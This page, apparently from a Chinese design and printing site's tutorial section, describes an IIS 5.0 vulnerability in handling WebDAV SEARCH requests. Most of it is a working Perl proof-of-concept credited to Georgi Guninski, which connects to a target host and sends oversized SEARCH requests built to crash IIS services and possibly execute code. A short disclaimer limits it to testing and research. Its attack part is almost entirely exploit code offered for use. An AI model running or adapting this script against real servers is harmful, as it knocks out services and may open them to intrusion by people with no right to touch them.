|
![]() |
名片设计 CorelDRAW Illustrator AuotoCAD Painter 其他软件 Photoshop Fireworks Flash |
|
涉及程序: IIS 描述: 通过构造特别的 SEARCH 哀求导致 IIS 执行攻击者代码漏洞 具体: 发现 IIS 在处理 SEARCH 哀求时存在漏洞,攻击者通过提交构造特别的 IIS SEARCH 哀求能重启与 IIS 相关的所有服务,而且可能远程执行任意代码。 以下代码仅仅用来测试和研究这个漏洞,假如您将其用于不正当的途径请后果自负 Details: --vv6.pl------------------------------------------------------------- #!/usr/bin/perl use IO::Socket; printf "IIS 5.0 SEARCHnWritten by Georgi Guninski wait some timen"; if(@ARGV < 2) { die "nUsage: IIS5host port n"; } $port = @ARGV[1]; $host = @ARGV[0]; sub vv() { $ll=$_[0]; #length of buffer $ch=$_[1]; $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return; $over=$ch x $ll; #string to overflow $xml=\\'<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE ("\\'.$over.\\'")</D:sql></D:searchrequest>\\'."n"; $l=length($xml); $req="SEARCH / HTTP/1.1nContent-type: text/xmlnHost: $hostnContent-length: $lnn$xmlnn"; syswrite($socket,$req,length($req)); print "."; $socket->read($res,3000); print "r=".$res; close $socket; } do vv(126000,"V"); sleep(1); do vv(126000,"V"); #Try 125000 - 128000 --------------------------------------------------------------- 受影响系统: IIS 5.0 返回类别: 教程 上一教程: XML、Web服务和.NET框架(1) 下一教程: “file”与“virtual”的区别 您可以阅读与"IIS 处理 SEARCH 哀求漏洞"相关的教程: · 微软修补其IIS软件中的又一处安全漏洞 · Win2k IIS 远程执行命令漏洞 · ASP漏洞集-MS IIS SERVER/FRONTPAGE EXT SERVER · 使用SQL MAIL收发和自动处理邮件 · 准确处理ASP动态网页中的容错机制 |
![]() ![]() |
快精灵印艺坊 版权所有 |
首页![]() ![]() ![]() ![]() ![]() ![]() ![]() |